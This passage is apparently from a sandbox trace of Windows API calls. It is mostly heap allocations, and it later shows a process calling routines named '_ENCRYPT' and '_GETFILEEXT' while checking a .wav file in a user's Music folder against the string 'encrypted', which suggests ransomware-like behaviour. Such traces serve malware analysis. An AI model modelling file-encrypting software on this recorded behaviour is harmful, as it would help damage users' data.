dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0038.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0038.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0038.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0038.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0038.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0038.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0038.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0038.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0038.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0038.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0038.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0038.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0038.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0038.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0038.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0038.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0038.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0038.850] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0038.850] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0038.850] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0038.850] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0038.850] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0038.850] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0038.850] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0038.850] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0038.850] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0038.850] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0038.850] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0038.850] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0038.850] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0038.850] FreeLibrary (hLibModule=0x76e10000) returned 1 [0038.850] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0038.850] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0038.850] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.850] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.850] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0038.850] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0038.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0038.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0038.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0038.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0038.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0038.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0038.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0038.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0038.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0038.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0038.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0038.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0038.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0038.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0038.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0038.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0038.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0038.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0038.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0038.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0038.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0038.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0038.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0038.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0038.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0038.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0038.852] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0038.852] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0038.852] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0038.852] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0038.852] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0038.852] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0038.852] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0038.852] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0038.852] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0038.852] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0038.852] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0038.852] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0038.852] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0038.852] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0038.852] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0038.852] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0038.852] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.852] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0038.852] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0038.852] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0038.852] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0038.852] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0038.852] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.852] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0038.852] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0038.852] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0038.852] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0038.852] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0038.852] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0038.852] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0038.852] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0038.852] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0038.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0038.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0038.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0038.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0038.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0038.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0038.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0038.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0038.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0038.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0038.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0038.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0038.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0038.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0038.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0038.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0038.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0038.853] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0038.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0038.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0038.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0038.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0038.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0038.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0038.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0038.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0038.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0038.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0038.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0038.854] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0038.854] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0038.854] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0038.854] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.854] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0038.854] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0038.854] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0038.854] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0038.854] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0038.854] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0038.854] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce68 [0038.854] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88ce68, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0038.854] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0038.854] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0038.854] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0038.854] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0038.854] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0038.854] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0038.854] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0038.854] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0038.854] CloseHandle (hObject=0x140) returned 1 [0038.854] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0038.854] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0038.854] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0038.855] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0038.855] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0038.855] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0038.855] FreeLibrary (hLibModule=0x76e10000) returned 1 [0038.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0038.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0038.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0038.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0038.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0038.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0038.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0038.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0038.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0038.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0038.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0038.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0038.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0038.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0038.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0038.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0038.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0038.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0038.855] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0038.855] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0038.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0038.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0038.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0038.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0038.856] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0038.856] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0038.856] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.856] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0038.856] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0038.856] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.856] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.856] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.856] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0038.856] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.856] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.856] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.856] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\ZaH-2jgJS1xf027TWp.wav", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe7f81270, ftCreationTime.dwHighDateTime=0x1d5bdc1, ftLastAccessTime.dwLowDateTime=0x509ea0e0, ftLastAccessTime.dwHighDateTime=0x1d5bc01, ftLastWriteTime.dwLowDateTime=0x509ea0e0, ftLastWriteTime.dwHighDateTime=0x1d5bc01, nFileSizeHigh=0x0, nFileSizeLow=0xfa32, dwReserved0=0x0, dwReserved1=0x777648, cFileName="ZaH-2jgJS1xf027TWp.wav", cAlternateFileName="ZAH-2J~1.WAV")) returned 0x7c20c0 [0038.856] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0038.856] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.856] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\ZaH-2jgJS1xf027TWp.wav", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe7f81270, ftCreationTime.dwHighDateTime=0x1d5bdc1, ftLastAccessTime.dwLowDateTime=0x509ea0e0, ftLastAccessTime.dwHighDateTime=0x1d5bc01, ftLastWriteTime.dwLowDateTime=0x509ea0e0, ftLastWriteTime.dwHighDateTime=0x1d5bc01, nFileSizeHigh=0x0, nFileSizeLow=0xfa32, dwReserved0=0x0, dwReserved1=0x777648, cFileName="ZaH-2jgJS1xf027TWp.wav", cAlternateFileName="ZAH-2J~1.WAV")) returned 0x7c20c0 [0038.856] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0038.857] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\ZaH-2jgJS1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\ZaH-2jgJS1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\ZaH-2jgJS1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\ZaH-2jgJS1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\ZaH-2jgJS1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\ZaH-2jgJS1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\ZaH-2jgJS1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\ZaH-2jgJS1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\ZaH-2jgJS1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\ZaH-2jgJS1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\ZaH-2jgJS1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\ZaH-2jgJS1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS 